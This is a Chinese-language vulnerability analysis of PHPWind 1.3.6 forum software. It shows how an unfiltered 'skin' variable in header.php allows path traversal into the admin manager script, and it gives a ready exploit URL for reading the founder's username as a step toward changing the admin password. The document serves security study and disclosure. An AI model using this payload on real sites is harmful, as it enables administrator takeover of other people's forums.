PHPWIND1.3.6论坛漏洞分析

PHPWIND 论坛是一款流行的PHP 论坛，界面美观，功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格，它和 DISCUZ 都非常相似，具体原因我想也就不用说了，毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点， DISCUZ 论坛安全性非常好，而且商家也对此非常重视安全问题，国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIND 虽然代码严谨，逻辑清楚，但还是有一些漏洞，而且还相当严重。

一 skin 变量未过滤导致管理员密码更改

废话少说，我们来分析漏洞。漏洞代码如下 (header.php) ：


!function_exists('readover') && exit('Forbidden');

if (!$skin) $skin=$db_defaultstyle; 

if(file_exists(R_P."data/style/$skin.php")){

include_once(R_P."data/style/$skin.php");

}else{

include_once(R_P."data/style/wind.php");

}

$yeyestyle=='no' ? $i_table="bgcolor=$tablecolor" : $i_table='class=i_table';

if($groupid=='guest' && $db_regpopup=='1'){

$head_pop='head_pop';

} else{

$head_gotmsg=$winddb['newpm']==1 ? '您有新消息':' 短消息 ';

}

require_once(PrintEot('css'));



require_once(PrintEot('header'));

?>

其中 $skin 变量是我们提交的，在运行到这里之前，只有一个地方处理过 $skin 变量：



$_COOKIE['skinco'] && empty($skin) && $skin=$_COOKIE['skinco'];

语句判断 COOKIE 中是否已经包含 skinco 的信息，如果有了，就取得 COOKIE 中的值，这是处理个人页面风格用的。但如果我们的 COOKIE 中没有这个值 , 那么我们提交的 skin 变量就会一点不变的传到上面的漏洞代码。有人问，如果系统关了 register_globals 会怎么样，关了也没关系。

if(!ini_get('register_globals') || !get_magic_quotes_gpc()){

@extract($_POST,EXTR_SKIP);

@extract($_GET,EXTR_SKIP);

@extract($_COOKIE,EXTR_SKIP);

@extract($_FILES,EXTR_SKIP);

}

系统在 global.php 中又给释放了。所以我们不管是用 GET 方法或者 POST 方法都可以把构造好的 SKIN 变量传给程序。那传给程序有什么用呢？这是重点！

我们看这段代码：

if(file_exists(R_P."data/style/$skin.php")){

include_once(R_P."data/style/$skin.php");

}…

含义是如果（ R_P.”data/style/$skin.php” ）文件存在就把它包含进来，我也不分析有几种用法了，我直接给出我最简单危害最大的利用方法。

我们把 skin 的值设为 ”../../admin/manager” ，那就变成了 R_P.”data/style/../../admin/manager.php”, 很显然，这是论坛管理用户的一个程序，存在而且可执行。这个程序是专门用来修改 sql_config.php 的，这里面都是重要数据，包括论坛创始人的用户名和密码。我们只要构造好就可以改它的密码，直接登陆后台管理。在改之前我们可以先查看创始人的用户名。

我给出查看的方法，大家可以比对论坛程序自己分析一下，我就不在赘述了。

http://localhost/phpwind/faq.php?skin=../../admin/manager&tplpath=admin